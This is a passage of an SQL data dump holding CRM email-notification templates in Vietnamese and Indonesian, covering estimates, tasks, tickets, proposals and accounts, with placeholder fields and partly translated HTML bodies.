(879, 'estimate', 'estimate-send-to-client', 'vietnamese', 'Send Estimate to Customer [vietnamese]', 'Yeu cau bao gia So: # {estimate_number} ', '<span style=\"font-size: 12pt;\">Dear {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">Please find the attached estimate <strong># {estimate_number}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>Estimate status:</strong> {estimate_status}</span><br /><br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br /><br /><span style=\"font-size: 12pt;\">We look forward to your communication.</span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}<br /></span>', '{companyname} |  yêu cầu', '', 0, 0, 0),
(880, 'ticket', 'ticket-reply-to-admin', 'vietnamese', 'Ticket Reply (Sent to Staff) [vietnamese]', 'Trả lời mới | Yêu cầu hỗ trợ', '<span style=\"font-size: 12pt;\">Một c&acirc;u trả lời mới của y&ecirc;u cầu hỗ trợ mới từ {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Ti&ecirc;u đề</strong>: {ticket_subject}</span><br /><span style=\"font-size: 12pt;\"><strong>Ph&ograve;ng ban</strong>: {ticket_department}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n</strong>: {ticket_priority}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>Tin nhắn:</strong></span><br /><span style=\"font-size: 12pt;\">{ticket_message}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem y&ecirc;u cầu tr&ecirc;n li&ecirc;n kết sau: <a href=\"{ticket_url}\">#{ticket_id}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(881, 'estimate', 'estimate-already-send', 'vietnamese', 'Estimate Already Sent to Customer [vietnamese]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(882, 'contract', 'contract-expiration', 'vietnamese', 'Contract Expiration Reminder (Sent to Customer Contacts) [vietnamese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(883, 'tasks', 'task-assigned', 'vietnamese', 'New Task Assigned (Sent to Staff) [vietnamese]', 'NHIỆM VỤ MỚI được giao - {task_name}', '<span style=\"font-size: 12pt;\">Dear {staff_firstname}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn đ&atilde; được giao cho một nhiệm vụ mới:</span><br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n:</strong> {task_name}<br /></span><strong>Ng&agrave;y bắt đầu:</strong> {task_startdate}<br /><span style=\"font-size: 12pt;\"><strong>Ng&agrave;y kết th&uacute;c:</strong> {task_duedate}</span><br /><span style=\"font-size: 12pt;\"><strong>Mức độ ưu ti&ecirc;n:</strong> {task_priority}<br /><br /></span><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{task_link}\">{task_name}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(884, 'tasks', 'task-added-as-follower', 'vietnamese', 'Staff Member Added as Follower on Task (Sent to Staff) [vietnamese]', 'Bạn được thêm làm người theo dõi trong nhiệm vụ  - {task_name}', '<span style=\"font-size: 12pt;\">Hi {staff_firstname}<br /></span><br /><span style=\"font-size: 12pt;\">Bạn đ&atilde; được th&ecirc;m l&agrave;m người theo d&otilde;i trong nhiệm vụ sau:</span><br /><span style=\"font-size: 12pt;\"><strong><br />T&ecirc;n nhiệm vụ:</strong> {task_name}</span><br /><span style=\"font-size: 12pt;\"><strong>Ng&agrave;y bắt đầu:</strong> {task_startdate}</span><br /><br /><span>Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: </span><a href=\"{task_link}\">{task_name}</a><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(885, 'tasks', 'task-commented', 'vietnamese', 'New Comment on Task (Sent to Staff) [vietnamese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(886, 'tasks', 'task-added-attachment', 'vietnamese', 'New Attachment(s) on Task (Sent to Staff) [vietnamese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(887, 'estimate', 'estimate-declined-to-staff', 'vietnamese', 'Estimate Declined (Sent to Staff) [vietnamese]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(888, 'estimate', 'estimate-accepted-to-staff', 'vietnamese', 'Estimate Accepted (Sent to Staff) [vietnamese]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(889, 'proposals', 'proposal-client-accepted', 'vietnamese', 'Customer Action - Accepted (Sent to Staff) [vietnamese]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(890, 'proposals', 'proposal-send-to-customer', 'vietnamese', 'Send Proposal to Customer [vietnamese]', 'Yêu cầu Tư Vấn Bán Hàng mới số: {proposal_number}  đã được tạo', 'Dear {proposal_proposal_to}<br /><br />Please find our attached proposal.<br /><br />This proposal is valid until: {proposal_open_till}<br />You can view the proposal on the following link: <a href=\"{proposal_link}\">{proposal_number}</a><br /><br />Please don\'t hesitate to comment online if you have any questions.<br /><br />We look forward to your communication.<br /><br />Kind Regards,<br />{email_signature}', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(891, 'proposals', 'proposal-client-declined', 'vietnamese', 'Customer Action - Declined (Sent to Staff) [vietnamese]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(892, 'proposals', 'proposal-client-thank-you', 'vietnamese', 'Thank You Email (Sent to Customer After Accept) [vietnamese]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(893, 'proposals', 'proposal-comment-to-client', 'vietnamese', 'New Comment  (Sent to Customer/Lead) [vietnamese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(894, 'proposals', 'proposal-comment-to-admin', 'vietnamese', 'New Comment (Sent to Staff)  [vietnamese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(895, 'estimate', 'estimate-thank-you-to-customer', 'vietnamese', 'Thank You Email (Sent to Customer After Accept) [vietnamese]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(896, 'tasks', 'task-deadline-notification', 'vietnamese', 'Task Deadline Reminder - Sent to Assigned Members [vietnamese]', 'NHẮC NHỞ - thời hạn nhiệm vụ | {companyname}', 'Hi {staff_firstname}&nbsp;{staff_lastname}<br /><br />Đ&acirc;y l&agrave; một email tự động từ {companyname}.<br /><br />Nhiệm vụ ph&acirc;n c&ocirc;ng&nbsp;<strong>{task_name}</strong> đến hạn ch&oacute;t <strong>{task_duedate}</strong>. <br />Nhiệm vụ n&agrave;y vẫn chưa kết th&uacute;c.<br /><br />Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{task_link}\">{task_name}</a><br /><br />Kind Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(897, 'contract', 'send-contract', 'vietnamese', 'Send Contract to Customer [vietnamese]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(898, 'invoice', 'invoice-payment-recorded-to-staff', 'vietnamese', 'Invoice Payment Recorded (Sent to Staff) [vietnamese]', 'Xác nhận thanh toán - WIT', '', '{companyname} | CRM', '', 0, 1, 0),
(899, 'ticket', 'auto-close-ticket', 'vietnamese', 'Auto Close Ticket [vietnamese]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(900, 'project', 'new-project-discussion-created-to-staff', 'vietnamese', 'New Project Discussion (Sent to Project Members) [vietnamese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(901, 'project', 'new-project-discussion-created-to-customer', 'vietnamese', 'New Project Discussion (Sent to Customer Contacts) [vietnamese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(902, 'project', 'new-project-file-uploaded-to-customer', 'vietnamese', 'New Project File(s) Uploaded (Sent to Customer Contacts) [vietnamese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(903, 'project', 'new-project-file-uploaded-to-staff', 'vietnamese', 'New Project File(s) Uploaded (Sent to Project Members) [vietnamese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(904, 'project', 'new-project-discussion-comment-to-customer', 'vietnamese', 'New Discussion Comment  (Sent to Customer Contacts) [vietnamese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(905, 'project', 'new-project-discussion-comment-to-staff', 'vietnamese', 'New Discussion Comment (Sent to Project Members) [vietnamese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(906, 'project', 'staff-added-as-project-member', 'vietnamese', 'Staff Added as Project Member [vietnamese]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(907, 'estimate', 'estimate-expiry-reminder', 'vietnamese', 'Estimate Expiration Reminder [vietnamese]', 'Nhắc nhở hết hạn | Đề Xuất Báo Giá', '<p><span style=\"font-size: 12pt;\">Hello {contact_firstname} {contact_lastname}</span><br /><br /><span style=\"font-size: 12pt;\">The estimate with <strong># {estimate_number}</strong> will expire on <strong>{estimate_expirydate}</strong></span><br /><br /><span style=\"font-size: 12pt;\">You can view the estimate on the following link: <a href=\"{estimate_link}\">{estimate_number}</a></span><br />{project_name}<br />----------------------------------------</p>\r\n<p class=\"p1\">NH&Agrave; CUNG CẤP QUẠT TRẦN UY T&Iacute;N CHẤT LƯỢNG CAO</p>\r\n<p class=\"p1\">{email_signature}</p>', '{companyname} | CRM', '', 0, 1, 0),
(908, 'proposals', 'proposal-expiry-reminder', 'vietnamese', 'Proposal Expiration Reminder [vietnamese]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(909, 'staff', 'new-staff-created', 'vietnamese', 'New Staff Created (Welcome Email) [vietnamese]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(910, 'client', 'contact-forgot-password', 'vietnamese', 'Forgot Password [vietnamese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(911, 'client', 'contact-password-reseted', 'vietnamese', 'Password Reset - Confirmation [vietnamese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(912, 'client', 'contact-set-password', 'vietnamese', 'Set New Password [vietnamese]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(913, 'staff', 'staff-forgot-password', 'vietnamese', 'Forgot Password [vietnamese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(914, 'staff', 'staff-password-reseted', 'vietnamese', 'Password Reset - Confirmation [vietnamese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(915, 'project', 'assigned-to-project', 'vietnamese', 'New Project Created (Sent to Customer Contacts) [vietnamese]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(916, 'tasks', 'task-added-attachment-to-contacts', 'vietnamese', 'New Attachment(s) on Task (Sent to Customer Contacts) [vietnamese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(917, 'tasks', 'task-commented-to-contacts', 'vietnamese', 'New Comment on Task (Sent to Customer Contacts) [vietnamese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(918, 'leads', 'new-lead-assigned', 'vietnamese', 'New Lead Assigned to Staff Member [vietnamese]', 'Khách hàng tiềm năng {lead_name}', '', '{companyname} | CRM', '', 0, 0, 0),
(919, 'client', 'client-statement', 'vietnamese', 'Statement - Account Summary [vietnamese]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(920, 'ticket', 'ticket-assigned-to-admin', 'vietnamese', 'New Ticket Assigned (Sent to Staff) [vietnamese]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(921, 'client', 'new-client-registered-to-admin', 'vietnamese', 'New Customer Registration (Sent to admins) [vietnamese]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(922, 'leads', 'new-web-to-lead-form-submitted', 'vietnamese', 'Web to lead form submitted - Sent to lead [vietnamese]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(923, 'staff', 'two-factor-authentication', 'vietnamese', 'Two Factor Authentication [vietnamese]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(924, 'project', 'project-finished-to-customer', 'vietnamese', 'Project Marked as Finished (Sent to Customer Contacts) [vietnamese]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(925, 'credit_note', 'credit-note-send-to-client', 'vietnamese', 'Send Credit Note To Email [vietnamese]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(926, 'tasks', 'task-status-change-to-staff', 'vietnamese', 'Task Status Changed (Sent to Staff) [vietnamese]', 'NHẮC NHỞ | Công việc phân công - WIT', '<span style=\"font-size: 12pt;\">Hi {staff_firstname}</span><br /><br /><span style=\"font-size: 12pt;\"><strong>{task_user_take_action}</strong> nhiệm vụ được đ&aacute;nh dấu l&agrave; <strong>{task_status}</strong></span><br /><br /><span style=\"font-size: 12pt;\"><strong>T&ecirc;n nhiệm vụ (c&ocirc;ng việc):</strong> {task_name}</span><br /><span style=\"font-size: 12pt;\"><strong>Due date:</strong> {task_duedate}</span><br /><br /><span style=\"font-size: 12pt;\">Bạn c&oacute; thể xem nhiệm vụ tr&ecirc;n li&ecirc;n kết sau: <a href=\"{task_link}\">{task_name}</a></span><br /><br /><span style=\"font-size: 12pt;\">Kind Regards,</span><br /><span style=\"font-size: 12pt;\">{email_signature}</span>', '{companyname} | CRM', '', 0, 1, 0),
(927, 'tasks', 'task-status-change-to-contacts', 'vietnamese', 'Task Status Changed (Sent to Customer Contacts) [vietnamese]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(928, 'staff', 'reminder-email-staff', 'vietnamese', 'Staff Reminder Email [vietnamese]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(929, 'contract', 'contract-comment-to-client', 'vietnamese', 'New Comment  (Sent to Customer Contacts) [vietnamese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(930, 'contract', 'contract-comment-to-admin', 'vietnamese', 'New Comment (Sent to Staff)  [vietnamese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(931, 'subscriptions', 'send-subscription', 'vietnamese', 'Send Subscription to Customer [vietnamese]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(932, 'subscriptions', 'subscription-payment-failed', 'vietnamese', 'Subscription Payment Failed [vietnamese]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(933, 'subscriptions', 'subscription-canceled', 'vietnamese', 'Subscription Canceled (Sent to customer primary contact) [vietnamese]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(934, 'subscriptions', 'subscription-payment-succeeded', 'vietnamese', 'Subscription Payment Succeeded (Sent to customer primary contact) [vietnamese]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(935, 'contract', 'contract-expiration-to-staff', 'vietnamese', 'Contract Expiration Reminder (Sent to Staff) [vietnamese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(936, 'gdpr', 'gdpr-removal-request', 'vietnamese', 'Removal Request From Contact (Sent to administrators) [vietnamese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(937, 'gdpr', 'gdpr-removal-request-lead', 'vietnamese', 'Removal Request From Lead (Sent to administrators) [vietnamese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(938, 'client', 'client-registration-confirmed', 'vietnamese', 'Customer Registration Confirmed [vietnamese]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(939, 'contract', 'contract-signed-to-staff', 'vietnamese', 'Contract Signed (Sent to Staff) [vietnamese]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(940, 'subscriptions', 'customer-subscribed-to-staff', 'vietnamese', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [vietnamese]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(941, 'client', 'contact-verification-email', 'vietnamese', 'Email Verification (Sent to Contact After Registration) [vietnamese]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(942, 'client', 'new-customer-profile-file-uploaded-to-staff', 'vietnamese', 'New Customer Profile File(s) Uploaded (Sent to Staff) [vietnamese]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(943, 'staff', 'event-notification-to-staff', 'vietnamese', 'Event Notification (Calendar) [vietnamese]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(944, 'subscriptions', 'subscription-payment-requires-action', 'vietnamese', 'Credit Card Authorization Required - SCA [vietnamese]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(945, 'invoice', 'invoice-due-notice', 'vietnamese', 'Invoice Due Notice [vietnamese]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(946, 'estimate_request', 'estimate-request-submitted-to-staff', 'vietnamese', 'Estimate Request Submitted (Sent to Staff) [vietnamese]', 'Yêu cầu Tư Vấn - Hỗ Trợ mới đã được gửi cho bạn', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(947, 'estimate_request', 'estimate-request-assigned', 'vietnamese', 'Estimate Request Assigned (Sent to Staff) [vietnamese]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(948, 'estimate_request', 'estimate-request-received-to-user', 'vietnamese', 'Estimate Request Received (Sent to User) [vietnamese]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(949, 'client', 'new-client-created', 'indonesia', 'New Contact Added/Registered (Welcome Email) [indonesia]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(950, 'invoice', 'invoice-send-to-client', 'indonesia', 'Send Invoice to Customer [indonesia]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(951, 'ticket', 'new-ticket-opened-admin', 'indonesia', 'New Ticket Opened (Opened by Staff, Sent to Customer) [indonesia]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(952, 'ticket', 'ticket-reply', 'indonesia', 'Ticket Reply (Sent to Customer) [indonesia]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(953, 'ticket', 'ticket-autoresponse', 'indonesia', 'New Ticket Opened - Autoresponse [indonesia]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(954, 'invoice', 'invoice-payment-recorded', 'indonesia', 'Invoice Payment Recorded (Sent to Customer) [indonesia]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(955, 'invoice', 'invoice-overdue-notice', 'indonesia', 'Invoice Overdue Notice [indonesia]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(956, 'invoice', 'invoice-already-send', 'indonesia', 'Invoice Already Sent to Customer [indonesia]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(957, 'ticket', 'new-ticket-created-staff', 'indonesia', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [indonesia]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(958, 'estimate', 'estimate-send-to-client', 'indonesia', 'Send Estimate to Customer [indonesia]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(959, 'ticket', 'ticket-reply-to-admin', 'indonesia', 'Ticket Reply (Sent to Staff) [indonesia]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(960, 'estimate', 'estimate-already-send', 'indonesia', 'Estimate Already Sent to Customer [indonesia]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(961, 'contract', 'contract-expiration', 'indonesia', 'Contract Expiration Reminder (Sent to Customer Contacts) [indonesia]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(962, 'tasks', 'task-assigned', 'indonesia', 'New Task Assigned (Sent to Staff) [indonesia]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(963, 'tasks', 'task-added-as-follower', 'indonesia', 'Staff Member Added as Follower on Task (Sent to Staff) [indonesia]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(964, 'tasks', 'task-commented', 'indonesia', 'New Comment on Task (Sent to Staff) [indonesia]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(965, 'tasks', 'task-added-attachment', 'indonesia', 'New Attachment(s) on Task (Sent to Staff) [indonesia]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(966, 'estimate', 'estimate-declined-to-staff', 'indonesia', 'Estimate Declined (Sent to Staff) [indonesia]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(967, 'estimate', 'estimate-accepted-to-staff', 'indonesia', 'Estimate Accepted (Sent to Staff) [indonesia]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(968, 'proposals', 'proposal-client-accepted', 'indonesia', 'Customer Action - Accepted (Sent to Staff) [indonesia]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(969, 'proposals', 'proposal-send-to-customer', 'indonesia', 'Send Proposal to Customer [indonesia]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(970, 'proposals', 'proposal-client-declined', 'indonesia', 'Customer Action - Declined (Sent to Staff) [indonesia]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(971, 'proposals', 'proposal-client-thank-you', 'indonesia', 'Thank You Email (Sent to Customer After Accept) [indonesia]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(972, 'proposals', 'proposal-comment-to-client', 'indonesia', 'New Comment  (Sent to Customer/Lead) [indonesia]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(973, 'proposals', 'proposal-comment-to-admin', 'indonesia', 'New Comment (Sent to Staff)  [indonesia]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(974, 'estimate', 'estimate-thank-you-to-customer', 'indonesia', 'Thank You Email (Sent to Customer After Accept) [indonesia]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(975, 'tasks', 'task-deadline-notification', 'indonesia', 'Task Deadline Reminder - Sent to Assigned Members [indonesia]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(976, 'contract', 'send-contract', 'indonesia', 'Send Contract to Customer [indonesia]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(977, 'invoice', 'invoice-payment-recorded-to-staff', 'indonesia', 'Invoice Payment Recorded (Sent to Staff) [indonesia]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(978, 'ticket', 'auto-close-ticket', 'indonesia', 'Auto Close Ticket [indonesia]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(979, 'project', 'new-project-discussion-created-to-staff', 'indonesia', 'New Project Discussion (Sent to Project Members) [indonesia]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(980, 'project', 'new-project-discussion-created-to-customer', 'indonesia', 'New Project Discussion (Sent to Customer Contacts) [indonesia]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(981, 'project', 'new-project-file-uploaded-to-customer', 'indonesia', 'New Project File(s) Uploaded (Sent to Customer Contacts) [indonesia]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(982, 'project', 'new-project-file-uploaded-to-staff', 'indonesia', 'New Project File(s) Uploaded (Sent to Project Members) [indonesia]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(983, 'project', 'new-project-discussion-comment-to-customer', 'indonesia', 'New Discussion Comment  (Sent to Customer Contacts) [indonesia]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(984, 'project', 'new-project-discussion-comment-to-staff', 'indonesia', 'New Discussion Comment (Sent to Project Members) [indonesia]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(985, 'project', 'staff-added-as-project-member', 'indonesia', 'Staff Added as Project Member [indonesia]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(986, 'estimate', 'estimate-expiry-reminder', 'indonesia', 'Estimate Expiration Reminder [indonesia]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(987, 'proposals', 'proposal-expiry-reminder', 'indonesia', 'Proposal Expiration Reminder [indonesia]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(988, 'staff', 'new-staff-created', 'indonesia', 'New Staff Created (Welcome Email) [indonesia]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(989, 'client', 'contact-forgot-password', 'indonesia', 'Forgot Password [indonesia]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(990, 'client', 'contact-password-reseted', 'indonesia', 'Password Reset - Confirmation [indonesia]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(991, 'client', 'contact-set-password', 'indonesia', 'Set New Password [indonesia]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(992, 'staff', 'staff-forgot-password', 'indonesia', 'Forgot Password [indonesia]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(993, 'staff', 'staff-password-reseted', 'indonesia', 'Password Reset - Confirmation [indonesia]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(994, 'project', 'assigned-to-project', 'indonesia', 'New Project Created (Sent to Customer Contacts) [indonesia]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(995, 'tasks', 'task-added-attachment-to-contacts', 'indonesia', 'New Attachment(s) on Task (Sent to Customer Contacts) [indonesia]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(996, 'tasks', 'task-commented-to-contacts', 'indonesia', 'New Comment on Task (Sent to Customer Contacts) [indonesia]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(997, 'leads', 'new-lead-assigned', 'indonesia', 'New Lead Assigned to Staff Member [indonesia]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(998, 'client', 'client-statement', 'indonesia', 'Statement - Account Summary [indonesia]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(999, 'ticket', 'ticket-assigned-to-admin', 'indonesia', 'New Ticket Assigned (Sent to Staff) [indonesia]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1000, 'client', 'new-client-registered-to-admin', 'indonesia', 'New Customer Registration (Sent to admins) [indonesia]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1001, 'leads', 'new-web-to-lead-form-submitted', 'indonesia', 'Web to lead form submitted - Sent to lead [indonesia]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1002, 'staff', 'two-factor-authentication', 'indonesia', 'Two Factor Authentication [indonesia]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1003, 'project', 'project-finished-to-customer', 'indonesia', 'Project Marked as Finished (Sent to Customer Contacts) [indonesia]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1004, 'credit_note', 'credit-note-send-to-client', 'indonesia', 'Send Credit Note To Email [indonesia]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1005, 'tasks', 'task-status-change-to-staff', 'indonesia', 'Task Status Changed (Sent to Staff) [indonesia]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1006, 'tasks', 'task-status-change-to-contacts', 'indonesia', 'Task Status Changed (Sent to Customer Contacts) [indonesia]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
